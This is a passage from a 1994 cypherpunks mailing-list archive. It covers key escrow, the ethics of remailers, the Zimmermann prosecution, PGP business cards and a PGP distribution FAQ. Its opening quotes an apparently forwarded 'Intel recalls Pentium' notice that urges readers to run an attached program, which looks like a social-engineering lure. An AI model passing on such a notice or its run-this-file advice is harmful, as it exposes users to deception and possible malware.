will be forwarded to postmaster at intel.com. =D.C. Williams ==============INCLUDED MESSAGE BELOW=========================== Subject: Intel recalls Pentium Status: RO CNN reported this weekend that Intel has announced that they will replace ALL defective Pentium(tm) processors, no questions asked.
To determine if your Pentium(tm) is defective, run the attached MS-DOS program FDIVBUG1.COM (source included also). It will tell you if you have the bug and where to call for a replacement if needed.

DJ

Message-ID: <9412292143.AA21512@toad.com>

>Rishab Aiyer Ghosh:
>As it so happens, hardly anyone here knew about Norton Encrypt so we got
>embroiled in this argument. If we were to adopt a consistently (and solely)
>moral stance, we would accept Detweiler's position that remailers are bad
>and should be banned because they can be easily misused.

There is a difference between believing that something is wrong (a moral stance), and believing that force should be used to stop it (a ban). A consistent position, for someone believing remailers are bad, would be that they personally wouldn't run a remailer or tell other people how to do so. It would not require advocating bans on remailers. And trying to _convince_ other people not to do something, without the threat of force, is not _banning_.
--
Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu)

"No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova

From ravage at bga.com Thu Dec 29 16:01:09 1994
From: ravage at bga.com (Jim choate)
Date: Thu, 29 Dec 94 16:01:09 PST
Subject: HACK ATTACK
In-Reply-To:
Message-ID: <199412300001.SAA01594@zoom.bga.com>

>
>
> Perhaps The Discovery Channel would like to know about encryption, etc.
> They listed their address as:
>
> pheedback at discovery.com
>
>

You can also ftp to discovery.com where they have a small collection of text files.

Happy New Year!

From rah at shipwright.com Thu Dec 29 16:23:08 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 29 Dec 94 16:23:08 PST
Subject: HACK ATTACK
Message-ID:

At 9:36 AM 12/29/94, Sandy Sandfort wrote:

>Was I the only one who saw ``Hack Attack'' on the Discovery
>Channel? The promos were typically sensationalistic. `In cyber-
>space, there is no privacy.' `Teenage hackers can read, change
>or destroy your computer files.' `No one is safe.' Yada, yada,
>yada.

They should do a Nova episode to set the record straight. Anyone know a producer at WGBH in Boston? I might, but the string may be a bit too skinny to pull on. If anybody wants to egg me on, send me e-mail, but there might be a more direct connection than any I could dig up...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                     someone who drinks too much and sees
Boston, MA 02331 USA                   snakes." -- Bertrand Russell
(617) 323-7923

From greg at ideath.goldenbear.com Thu Dec 29 16:53:07 1994
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Thu, 29 Dec 94 16:53:07 PST
Subject: ideath remailer erratic over New Years' weekend
Message-ID: <199412300051.AA04536@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

The anon remailer at ideath.goldenbear.com will likely be available only erratically over the next few days; after the move it will be co-located at a site featuring a 56K frame relay connection, so reliability should be good after that. I don't anticipate losing any traffic, but mail will be travelling via dialup UUCP not TCP/IP until the move is complete and the DNS data is updated.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwNY7n3YhjZY3fMNAQE9PAP9HQCb+GlzH2pbuYCatjuX9Rlt/YHfSXmv
wC87jhLWi5KneMwbaf49mj2JGNCHtNC+VPetofB/dNvrQyfeRHpJEiDrJlg5q8DS
31L5zh7lTp3yybUlmCVBR7ovn9LAgPui6xMfIKqRtQ9Q7d99E58fBROctdbFxtUM
rnA0kdCjq94=
=LkeA
-----END PGP SIGNATURE-----

From nobody at replay.com Thu Dec 29 17:27:27 1994
From: nobody at replay.com (Name withheld on request)
Date: Thu, 29 Dec 94 17:27:27 PST
Subject: No Subject
Message-ID: <199412300127.AA13833@xs1.xs4all.nl>

Anybody know where there are compiled, ready to use versions of triple DES?

From wcs at anchor.ho.att.com Thu Dec 29 18:07:20 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 29 Dec 94 18:07:20 PST
Subject: Breaking into girlfriend's files
Message-ID: <9412300205.AA16377@anchor.ho.att.com>

Gentlemen don't read their girlfriends' mail, either.....

On the other hand, if the original poster was telling the truth, he _did_ at least say he was trying to read his girlfriend's files, rather than saying "I used Norton Encrypt on some files for a project last year, and I've forgotten the password - is there some way to recover it?" which would have been sleazy and not started a flamewar. Or, if he wasn't telling the truth, maybe he's really trying to break his business competitor's files, or some government's, or he's really L..D.. in yet another disguise.

Bill

From camp at industrial.com Thu Dec 29 22:15:26 1994
From: camp at industrial.com (camp at industrial.com)
Date: Thu, 29 Dec 94 22:15:26 PST
Subject: Thanx
Message-ID:

I think I am a more enlightened individual now. First thing when I get back into FTP land I get the FAQ (cool faq name BTW). I was not intending to criticize, it just seemed to be a lot more flamish than I expected and I guess that is what expecting things does.
gemnis

From blancw at pylon.com Thu Dec 29 22:41:16 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Thu, 29 Dec 94 22:41:16 PST
Subject: Morality masks technical ignorance
Message-ID: <199412300642.WAA27643@deepthought.pylon.com>

Responding to msg by Adam Shostack ( when bad things happen to good crypto):

The technical reason to oppose GAK is that it adds points of failure to a crypto system which need not be there. Those POF are not adequately tied to the consequences of their actions (releasing a key improperly), and as such will be used as points to attack the integrity of the system.
...............................................................

And if there were no points of failure added by it, would you approve, agree, to its mandatory requirement?

..
Blanc

From blancw at pylon.com Thu Dec 29 22:41:33 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Thu, 29 Dec 94 22:41:33 PST
Subject: Morality masks technical ignorance
Message-ID: <199412300642.WAA27667@deepthought.pylon.com>

Responding to msg by rishab:

:And the key word in _my_ post was _means_,
:not _reason why_.

Oh - I thought maybe it was "ours is not to reason why". ( kidding! )

:I.e. that (in my view of the Cpunk position) one
:can protect privacy not through morals, policies or
:law, but through technology.

I also don't see much success in attempting to protect privacy through the promotion of morals, policies, or laws, either. However, the list is always engaged in discussing 'privacy rights' as a basis for their own objections to governments' attitudes against the unfettered use of new technologies. Recognizing that we all live in a context made up of philosophical stands, politics, and legalities, and that as you said, "these are the glitches in discourse we have to face on a list that's for both technology and policy", it can't seem real to position this aspect completely out of the realm of thought as a non-valid element.
Some people are going to want to think of the applications of technology in moral terms, and in a free society one must make allowances for those kinds of people. It should be possible to at least think about its proper place, occasionally, without suffering too much from the association.

..
Blanc

From jamesd at netcom.com Thu Dec 29 23:55:48 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 29 Dec 94 23:55:48 PST
Subject: Morality masks technical ignorance
In-Reply-To: <199412300642.WAA27667@deepthought.pylon.com>
Message-ID:

On Thu, 29 Dec 1994 blancw at pylon.com wrote:
> I also don't see much success in attempting to protect privacy
> through the promotion of morals, policies, or laws, either.

If we fail to point out that people have a right to privacy, if we fail to point out the moral and constitutional implications of coercive inspection, then our enemies win, by citing tax evaders, child pornographers, terrorists and pedophiles.

Public key technology is totally ineffective against rubber hoses.

How people are to live together peaceably is always first and foremost a moral question.

If all morality is relative, then the only possible way for people to live together peaceably is for a single authority to define morality absolutely by its arbitrary will and to impose that morality by as much violence as necessary -- this is the classic argument (Hobbes, Nazis) for absolutist government.

If this is so, then of course private cryptography must be suppressed, and private ownership of guns, and as much of the internet as is necessary to ensure that communication is strictly few to many rather than many to many.

There are good historical examples of this kind of thing: In Japan, under feudalism, science and technology was proceeding well. They got hold of a western gun, and rapidly produced large numbers of excellent imitations.
Now feudalism in Japan was based primarily on the fact that a samurai, trained from infancy in the art of war, wearing carefully tailored armor, could easily defeat a peasant with a sword. But they soon realized that guns were equalizers -- that a peasant with a gun was roughly equal to a samurai with a gun, even though a peasant with a sword was totally unequal to a samurai with a sword.

So they banned guns, not only for the peasants, but for themselves, and ordered a halt to technology. This coercive reversal of technology was completely effective until outsiders with guns started knocking on their door.

An even more relevant example is paper. When paper was first discovered, the Chinese government, foreseeing the revolutionary threat posed by paper, made it a state monopoly, made private possession of the knowledge of paper manufacture punishable by death, castrated those permitted to make paper so that the knowledge would not be passed from father to son, and successfully kept paper to themselves for a very long time.

This monopoly was broken when western barbarians kidnapped some of the eunuchs. This immediately made woodcut printing feasible, which had strong revolutionary effects, and eventually led to moveable type printing, which had even greater revolutionary effects.

Note that the technology did not have revolutionary effects until it got into the hands of those who had strong moral beliefs, based on natural law theory, beliefs that led to the position that the king could not make law as he pleased, that many actions of the state were unlawful.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From prz at acm.org Fri Dec 30 00:06:43 1994
From: prz at acm.org (Philip Zimmermann)
Date: Fri, 30 Dec 94 00:06:43 PST
Subject: January meeting with Zimmermann's prosecutor
Message-ID:

The following is a message from my lawyer, Phil Dubois. He posted it to alt.security.pgp, and I thought I should post it here as well. The message is signed with his key.

--Philip Zimmermann

-----BEGIN PGP SIGNED MESSAGE-----

Phil Zimmermann and his defense team are heartened by the substantial outpouring of support that has been demonstrated through numerous postings in this and other news groups. As we approach a crucial meeting with the prosecutor, it is particularly encouraging to see that many others are willing to devote themselves, both financially and through volunteered time, to Phil's defense.

A number of postings have suggested a variety of support activities ranging from petitions to the President to gatherings in San Jose. Phil's lawyers are concerned that some of these activities would not assist in our efforts to protect his legal interests and could in fact hurt.

The upcoming meeting with the prosecutor is not a court hearing, but is a private meeting of counsel. Neither Phil nor any judicial official will be present. It will not be a trial or hearing, but a discussion with the Assistant United States Attorney who is handling Phil's case. As such, it is not an appropriate setting for any public demonstrations of support for Phil or for unrestricted dissemination of cryptography. What Phil needs at that meeting is a quiet environment in which serious legal issues can be discussed candidly in an effort to avoid the necessity for any trial.

Given the purposes and importance of the meeting, we -- and most especially Phil Zimmermann -- ask that any of his supporters not come to San Jose for any form of public demonstration. We encourage you instead to continue to support Phil's defense by financial contributions.
Communications of support to government officials in Washington, DC are also appropriate and helpful.

To the extent that effective representation of Phil's interest permits us to communicate with his supporters, we will periodically post announcements to this and other appropriate news groups.

Philip L. Dubois
Lawyer

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLwJTObZ7C+AHeDONAQH1jAP/T6ZMSIAbgjfLliPbDALVMaOkuHBHGdeq
ny0KPsZhIz6/K6ate8yr1uF84RtdolHMx73DBpSf6L9H7d3zcPVfy3ArAv44J/kZ
jX0y36eCcn9pxhtU+41k9vkSLnGaNdiM5JKpehbRLgP0Gm+dAq0tbGNIXwL0XOEq
CKmZXTWj/vs=
=4hhB
-----END PGP SIGNATURE-----

From crawford at scruznet.com Fri Dec 30 01:41:19 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Fri, 30 Dec 94 01:41:19 PST
Subject: My "netcard"
Message-ID: <199412300941.BAA01313@scruz.net>

I thought y'all would be tickled by the "e-card" I made up in preparation for the MacWorld Expo.

I made a bunch of cards from Avery 5371 Laser Business Cards (about twelve bucks for 250 cards, at most office supply stores).

On the front is a nifty logo, my name, and my e-mail address. No phone or snail address. (I have a regular card for that, or I can write my number on the e-card if I want the recipient to have it).

On the back is a headline "PGP Public Key Encryption Key", followed by these instructions:

"Enter the key block exactly as shown. Check carefully to ensure that it is correct. Then remove the spaces between the 8 character groups and add to your public keyring."

(Suggestions for wording? I don't have much space...)

Following is my ASCII-armored public key, in courier font so it is fixed-width and everything lines up nicely. I added a space after every eighth character. Maybe I should use a narrower space and put it after every fourth.

To save space (and user typing) I copied my key into a new keyring and removed all the signatures from it before extracting it as ASCII. It is also in a just-readable 5-point size.
Finally, it says "For a fully-signed key, finger crawford at maxwell.ucsc.edu".

One might ask, "if they can finger, why give the key?" The recipient might not be on the Internet. I don't think you can finger from AOL, and I'm sure you can't from UUCP, AppleLink or CompuServe.

In any case, it will be more convenient for the people I meet at the show to enter my key on their laptops back at the hotel, without having to cruise the net looking for my key.

I dig it. It needs some sprucing up on the graphic design, but it seems like it will be useful.

Regards,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

From adam at bwh.harvard.edu Fri Dec 30 07:41:57 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 30 Dec 94 07:41:57 PST
Subject: Morality masks technical ignorance
In-Reply-To: <199412300642.WAA27643@deepthought.pylon.com>
Message-ID: <199412301541.KAA10803@bwh.harvard.edu>

Blanc asks:

| Responding to msg by Adam Shostack ( when bad things happen to
| good crypto):
|
| The technical reason to oppose GAK is that it adds points of
| failure to a crypto system which need not be there. Those POF
| are not adequately tied to the consequences of their actions
| (releasing a key
| improperly), and as such will be used as points to attack the
| integrity of the system.
| ...............................................................
|
| And if there were no points of failure added by it, would you
| approve, agree, to its mandatory requirement?

I wouldn't care. First, any GAK system must add points of failure. Second, if it didn't add points of failure, it would be another expensive and pointless government program. Since there are no points of failure, they can never access my key.
That's not because key access is arbitrarily defined as a failure, but because any mechanism that allows them to get my key from a database can be subverted to get keys for which there is no 'legitimate' need.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
    -Hume

From roy at cybrspc.mn.org Fri Dec 30 08:24:17 1994
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 30 Dec 94 08:24:17 PST
Subject: Morality masks technical ignorance
In-Reply-To: <199412300642.WAA27643@deepthought.pylon.com>
Message-ID: <941230.011239.2D4.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, blancw at pylon.com writes:

>
> Responding to msg by Adam Shostack ( when bad things happen to
> good crypto):
>
> The technical reason to oppose GAK is that it adds points of
> failure to a crypto system which need not be there.
[...]
> And if there were no points of failure added by it, would you
> approve, agree, to its mandatory requirement?

Sorry, blanc, but the very existence of GAK is a point of failure.

- --
Roy M. Silvernail [ ] roy at cybrspc.mn.org
PGP public key available by mail
echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org
These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwOzQxvikii9febJAQH0XgQAnL/dMtrIgu7L1dgjswOD4LZH6yZHkZ0x
V4ZFlm9oCCc089p6XaQgaOZTcBSfKiTlVHq4BXV2EWpm6ULX77rvn1cHSbmOdpvc
hjFc8bbPg586if+oGRCNXs2yO5s+KQygQh72w9D3zCVDMaFaJzCZqoa9WmMT6HmM
YsJJz5ytGCY=
=rlpe
-----END PGP SIGNATURE-----

From bart at netcom.com Fri Dec 30 08:36:27 1994
From: bart at netcom.com (Harry Bartholomew)
Date: Fri, 30 Dec 94 08:36:27 PST
Subject: RFCs 1750 & 1751
Message-ID: <199412301636.IAA05937@netcom5.netcom.com>

adam at bwh.harvard.edu (Adam Shostack) wrote:
>
>
>
> FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating
> strong random numbers. 1751 standardizes a means of converting a 128
> bit number to a set of English words.
>
>
> Adam
>
> --
> "It is seldom that liberty of any kind is lost all at once."
> -Hume

Available for ftp at ds.internic.net (not at a lot of other normal rfc sources yet).

From eric at remailer.net Fri Dec 30 10:31:35 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 30 Dec 94 10:31:35 PST
Subject: My "netcard"
In-Reply-To: <199412300941.BAA01313@scruz.net>
Message-ID: <199412301526.HAA05913@largo.remailer.net>

   From: crawford at scruznet.com (Michael D. Crawford)

   I made a bunch of cards from Avery 5371 Laser Business Cards (about
   twelve bucks for 250 cards, at most office supply stores).

A good choice for stock. I've done stickers, but they don't work nearly so well.

   On the back is a headline "PGP Public Key Encryption Key", followed
   by these instructions:

I'd also recommend putting your key fingerprint on the card for those people who _can_ get your key off the Internet and who just want to verify that it's accurate.

Eric

From nobody at c2.org Fri Dec 30 11:06:34 1994
From: nobody at c2.org (Anonymous User)
Date: Fri, 30 Dec 94 11:06:34 PST
Subject: My "netcard"
Message-ID: <199412301904.LAA11075@zero.c2.org>

Michael D. Crawford wrote:

> One might ask, "if they can finger, why give the key?" The recipient
> might not be on the Internet. I don't think you can finger from AOL,
> and I'm sure you can't from UUCP, AppleLink or CompuServe.

Yes you can! You just have to know how to use finger-by-email. :)

From cactus at hks.net Fri Dec 30 11:20:20 1994
From: cactus at hks.net (L. Todd Masco)
Date: Fri, 30 Dec 94 11:20:20 PST
Subject: LaMacchia case dismissed
Message-ID: <199412301925.OAA08386@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

============================================================================
SUBJECT: JUDGE DISMISSES INDICTMENT AGAINST MIT COMPUTER WHIZ
SOURCE: Reuters via Fulfillment by INDIVIDUAL, Inc.
DATE: December 29, 1994
INDEX: [3]
ORDER NO: 953095#
- -----------------------------------------------------------------------------

BOSTON (Reuter) - The Reuters European Business Report via INDIVIDUAL, Inc. : A federal judge Thursday dismissed an indictment against a Massachusetts Institute of Technology student who had been accused of the biggest case of computer software piracy ever.

The student, David LaMacchia, 20, was indicted March 7 on a charge of conspiracy to commit wire fraud. He was accused of using the university's computers to distribute pirated software over the Internet, the web of global computer networks.

The U.S. Attorney in Boston, Donald Stern, had called it the largest single case of software piracy to date.

Although U.S. District Court Judge Richard Stearns was critical of LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud statute because it could result in a flood of actions against home computer users copying even single software programmes for their own use.

However, the judge described LaMacchia as ``heedlessly irresponsible, and at worst as nihilistic, self-indulgent and lacking in any fundamental sense of values.''

According to the indictment, LaMacchia, an electrical engineering and computer science student, used two MIT computers to create bulletin boards from which Internet users could post or copy commercial copyrighted software worth close to $1 million.

He was accused of using the computer aliases ``John Gaunt'' and ``Grimjack'' to operate the bulletin board from November 1993 to January 1994.

LaMacchia was not accused of profiting from the scheme, nor was he accused of personally posting or copying any software on the bulletin board.

The Software Publishers Association, a trade group representing software makers, estimates software piracy cost manufacturers about $1.6 billion last year.
[12-29-94 at 17:21 EST, Copyright 1994, Reuters America Inc., File: r1229172.000]
- -----------------------------------------------------------------------------
Entire contents (C) 1994 by INDIVIDUAL, Inc., 84 Sherman Street, Cambridge, MA 02140 - Phone: 800-414-1000 or 617-354-2230, FAX: 800-417-1000 or 617-354-6210.
=================[The End - HEADSUP FULFILLMENT SERVICE]====================

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwRenSoZzwIn1bdtAQEZagF/dGPp8lNH3umZlmpgsYrQB6ucudyneYSj
alge2SqCet5p10haY0zVfxBD7WOOW7Uv
=Raf8
-----END PGP SIGNATURE-----

From tavi at info.polymtl.ca Fri Dec 30 11:35:09 1994
From: tavi at info.polymtl.ca (Octavian Ureche)
Date: Fri, 30 Dec 94 11:35:09 PST
Subject: Remailer source
Message-ID: <199412301935.AA22766@von-neumann.info.polymtl.ca>

Does anybody know where could I find UNIX sources for a remailer ?

Tnx.
Tavi Ureche

From witter at utdallas.edu Fri Dec 30 11:48:34 1994
From: witter at utdallas.edu (witter at utdallas.edu)
Date: Fri, 30 Dec 94 11:48:34 PST
Subject: My "netcard"
In-Reply-To: <199412301904.LAA11075@zero.c2.org>
Message-ID:

On Fri, 30 Dec 1994, Anonymous User wrote:

> Michael D. Crawford wrote:
>
> > One might ask, "if they can finger, why give the key?" The recipient
> > might not be on the Internet. I don't think you can finger from AOL,
> > and I'm sure you can't from UUCP, AppleLink or CompuServe.
>
> Yes you can! You just have to know how to use finger-by-email. :)
>

Just in case you were wondering...
TO:infobot at infomania.com
Sub: FINGER name at internic.net

From rishab at dxm.ernet.in Fri Dec 30 12:16:35 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 30 Dec 94 12:16:35 PST
Subject: Morality masks technical ignorance
Message-ID:

arromdee at blaze.cs.jhu.edu (Ken Arromdee):
> >Rishab Aiyer Ghosh:
> >As it so happens, hardly anyone here knew about Norton Encrypt so we got
> >embroiled in this argument. If we were to adopt a consistently (and solely)
> >moral stance, we would accept Detweiler's position that remailers are bad
> >and should be banned because they can be easily misused.
>
> There is a difference between believing that something is wrong (a moral
> stance), and believing that force should be used to stop it (a ban). A

"If it weren't for nitpickers, we'd all be knee-deep in nits."

OK, what I meant of course was that we could adopt the _moral stance_ that remailer misusers (like misbehaving boyfriends) are reprehensible, and that therefore we should not discuss making remailers untraceable (or breaking Norton Encrypt) lest we inadvertently help the Forces of Evil. OTOH knowledge about anonymous remailers (and the fallibility of Norton Encrypt) is _good_ for privacy - as I said, the latter was not discussed due to apparent technical ignorance.
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                      "In between the breaths is
rishab at dxm.ernet.in                    the space where we live"
rishab at arbornet.org                       - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From mpj at netcom.com Fri Dec 30 12:25:10 1994
From: mpj at netcom.com (Michael Paul Johnson)
Date: Fri, 30 Dec 94 12:25:10 PST
Subject: Where to Get PGP FAQ
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

===============================BEGIN SIGNED TEXT=============================

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP)

(Last modified: 30 December 1994 by Mike Johnson)

WHAT IS THE LATEST VERSION?

|-----------------+---------------------+---------------------------------|
| Platform(s)     | Latest Version      | Distribution File Names         |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | Viacrypt PGP 2.7    | disk sets                       |
| Mac, Windows,   |                     |                                 |
| or WinCIM/CSNav |                     |                                 |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | MIT PGP 2.6.2       | pgp262.zip (DOS + docs)         |
| others          |                     | pgp262s.zip (source)            |
|                 |                     | pg262s.zip source on CompuServe |
|                 |                     | pgp262.tar.gz (source)          |
|                 |                     | pgp262.gz (same as above on DOS)|
|                 |                     | pgp262.tar.Z (source)           |
|                 |                     | pgp262dc.zip (documentation)    |
|                 |                     | pg262d.zip (docs on CompuServe) |
|-----------------+---------------------+---------------------------------|
| Macintosh       | MIT PGP 2.6         | MacPGP2.6.sea.hqx (binary+docs) |
|                 |                     | macpgp26.hqx (same as above)    |
|                 |                     | MacPGP2.6.src.sea.hqx (source)  |
|                 |                     | macpgp26.src (same as above)    |
|                 |                     | MacPGP2.6-68000.sea.hqx (binary)|
|                 |                     | mcpgp268.hqx (same as above)    |
|-----------------+---------------------+---------------------------------|
| Mac Applescript | MacPGP 2.6ui v 1.2  | MacPGP-2.6ui-v1.2.sit.hqx       |
|                 | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx|
|                 | based on MIT PGP    | MacPGP2.6uiV1.2en.cpt.hqx       |
|                 | 2.6.2               | MacPGP2.6uiV1.2src.cpt.hqx      |
|                 |                     | MacPGP2.6uiV1.2.68000.hqx       |
|                 |                     | MacPGP2.6.2.beta.sea.hqx        |
|                 |                     | MacPGP2.6.2.beta.src.sea.hqx    |
|-----------------+---------------------+---------------------------------|
| Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                 |                     | pgp262-a14-020.lha              |
|                 |                     | pgp262-a14-src.lha              |
|-----------------+---------------------+---------------------------------|
| Atari           | Atari PGP 2.6ui     | pgp26uib.lzh (binary, docs)     |
|                 |                     | pgp26uis.lzh                    |
|-----------------+---------------------+---------------------------------|
| Archimedes      | Archimedes 2.3a     | ArcPGP23a                       |
|-----------------+---------------------+---------------------------------|
| Non-USA version | PGP 2.6.i from      | pgp26i.zip                      |
| to avoid RSAREF | Stale Schumacher    | pgp26is.zip                     |
| license.        |                     | pgp26is.tar.gz                  |
|_________________|_____________________|_________________________________|

WHERE CAN I LEARN ABOUT PGP?

First, get a copy and read the instructions that come with it. There are also at least two books on PGP. I've read the following and think it is pretty good:

    Protect Your Privacy: A Guide for PGP Users
    William Stallings
    Prentice-Hall, ISBN 0-13-185596-4, $19.95, 300 pages

is available at most technical bookstores and many general bookstores such as Barnes and Noble. If you order it from National Computer Security Association (74774.1326 at compuserve.com) they will donate $1 of the price to Phil Zimmermann's legal defense fund.

WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN?

This is the MIT version. For several good reasons, Phil is releasing the main line freeware PGP through MIT, at net-dist.mit.edu. See a list of sites that also carry this version, below, or use this WWW URL:

http://web.mit.edu/network/pgp-form.html

WHAT IS PGP 2.6.i?

Stale Schumacher released an international version of PGP built the "right way."
By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) where RSA patents don't hold.

Note that the latest version of Stale Schumacher's PGP is 2.6.i, 2.6i (without the second .) was a beta test version that has been superseded.

WHAT IS PGP 2.6ui?

The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1. They have a "ui" somewhere in their file names. I recommend the use of the "ui" versions only if you are using a platform for which there is no Viacrypt or MIT PGP that works properly. For a version that doesn't use RSAREF, PGP 2.6.i from Stale Schumacher is a better choice, because it is more up-to-date.

WHERE CAN I GET VIACRYPT PGP?

If you are a commercial user of PGP in the USA or Canada, contact Viacrypt in Phoenix, Arizona, USA. The commercial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7.
Here is a brief summary of Viacrypt's currently-available products:

1. ViaCrypt PGP for MS-DOS. Prices start at $99.98

2. ViaCrypt PGP for UNIX. Includes executables for the following platforms:

     SunOS 4.1.x (SPARC)
     IBM RS/6000 AIX
     HP 9000 Series 700/800 UX
     SCO 386/486 UNIX
     SGI IRIX
     AViiON DG-UX(88/OPEN)

   Prices start at $149.98

   Executables for the following additional platforms are available upon request for an additional $30.00 charge.

     BSD 386
     Ultrix MIPS DECstation 4.x

3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98

Please contact ViaCrypt for quantity discount pricing.

Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards.

If you have further questions, please feel free to contact:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847
Phone: (602) 944-0773
Fax: (602) 943-2601
Internet: viacrypt at acm.org
Compuserve: 70304.41

WHERE CAN I GET THE FREEWARE PGP?

These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list. Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP.

There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy.

FTP SITES IN NORTH AMERICA

There are some weird hoops to jump through, thanks to the U. S. Department of State, at many of these sites. This is apparently because the U. S.
Department of State wants to make it easier for people outside of North America to develop, distribute, use, or sell strong cryptographic software than people inside of the USA and Canada -- at least that is the effect of their rules.

Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws).

1. Read ftp://net-dist.mit.edu/pub/PGP/mitlicen.txt and agree to it.
2. Read ftp://net-dist.mit.edu/pub/PGP/rsalicen.txt and agree to it.
3. Telnet to net-dist.mit.edu and log in as getpgp.
4. Answer the questions and write down the directory name listed.
5. QUICKLY end the telnet session with ^C and ftp to the indicated directory on net-dist.mit.edu (something like /pub/PGP/dist/U.S.-only-????) and get the distribution files (see the above chart for names). If the hidden directory name is invalid, start over at step 3, above.

You can also get PGP from:

ftp.csn.net/mpj
    See ftp://ftp.csn.net/mpj/README.MPJ

ftp.netcom.com/pub/mp/mpj
    See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ

ftp.eff.org
    Follow the instructions found in README.Dist that you get from one of:
    ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
    gopher.eff.org, 1/Net_info/Tools/Crypto
    gopher://gopher.eff.org/11/Net_info/Tools/Crypto
    http://www.eff.org/pub/Net_info/Tools/Crypto/

ftp.csua.berkeley.edu (for U. S.
or Canadian users)
    /pub/cypherpunks/pgp/

ftp.gibbon.com
    /pub/pgp/README

ftp.wimsey.bc.ca
    /pub/crypto/software/dist/README

WORLD WIDE WEB ACCESS

http://web.mit.edu/network/pgp-form.html
http://www.ifi.uio.no/~staalesc/PGPVersions.html
http://www.mantis.co.uk/pgp/pgp.html
http://rschp2.anu.edu.au:8080/crypt.html
http://www.eff.org/pub/Net_info/Tools/Crypto/
http://community.net/community/all/home/solano/sbaldwin
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html

COMPUSERVE

GO NCSAFORUM. Follow the instructions there to gain access to Library 12: Export Controlled. PGP may be other places, too. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only).

BULLETIN BOARD SYSTEMS

Colorado Catacombs BBS
Mike Johnson, sysop
